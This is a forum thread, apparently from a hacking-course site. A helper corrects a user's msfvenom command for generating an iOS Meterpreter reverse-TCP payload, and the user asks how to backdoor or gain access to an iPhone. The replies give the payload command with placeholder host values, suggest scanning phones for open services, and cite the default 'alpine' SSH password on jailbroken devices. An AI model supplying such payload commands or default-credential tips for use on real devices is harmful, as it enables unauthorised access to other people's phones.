- This topic has 10 replies, 2 voices, and was last updated 2 years, 8 months ago by
.
- Posts
Hey guys,
I have been try from msfvenom to generate a payload with my public IP for apple_ios and seems doesn’t work or generate, and shows me an error. In the picture that I’ll post you can understand fully what I’ve been doing to generate.
waiting for your help.
Hi!
You are combining options that won’t work. If you want to create an iOS malicious app then you can set the architecutre to osx-app nor can select the format as exe, that’s a windows thing only, neither add .exe extension to the name of the file. So I’ll suggest to remove -a anf -f and use a file name without extensions for -o, msfvenom should add the proper values by default.
Greetings!
DiegoHey Diego,
Thanks for responding. I did get it now, so I did what you advise me to do. Delete -e and -f and used the file name without extension. But the output was saying the selected arch(osx-app) is incompatible. so I type msfvenom –list archs and that what I get.
Best regards,
Hi!
I’ll suggest to read properly what I wrote above, I mentioned to delete -a because using osx-app is incorrect.Greetings!
Diegoit doesn’t work man, can you please write the code for me? or give me a example for the same payload!
Hi!
I have already told what you need to remove, so if you follow what I mentioned you would just run a command like:
msfvenom -p apple_ios/meterpreter_reverse_tcp LHOST=ip LPORT=port -f myfileWhy do you say it doesn’t work? What’s the problem? Can you share the last command used, the rsult and explain the problem?
Also explain what exactly do you expect to get here because msfvenom will not create a malicious .ipa file if that’s what you are trying to do, it will be just a script but in order to run it you would need a jailbroken iphone or ipad.Thanks!
DiegoWhy do you say it doesn’t work? What’s the problem? Can you share the last command used, the rsult and explain the problem?
Also explain what exactly do you expect to get here because msfvenom will not create a malicious .ipa file if that’s what you are trying to do, it will be just a script but in order to run it you would need a jailbroken iphone or iPad.I expect from msfvenom to create payload and make a backdooring with images or link or anything. if that wouldn’t work. how to make a backdooring in iOS or gaining access in iPhone.
Hi!
For iPhones, the process is harder, because Apple does not let its users to install applications outside the App Store, so what you can do in case of iOS is to try and scan it as shown in the course to check if it has any vulnerable service on open ports using Zenmap or any other vulnerability scanner, though I don’t think that you will get that much from the scan results if the phone wasn’t jailbroken, but it’s worth to try and see. Also, if the iPhone was jailbroken, then the procedure will be a lot easier (Take for example the SSH service running on port 22 with a default password of Alpine). There are other social engineering techniques that can be used to gain access, but they’re not very realistic and it’s not worth even to try them sometimes.
Greetings!
Diego
- You must be logged in to reply to this topic.
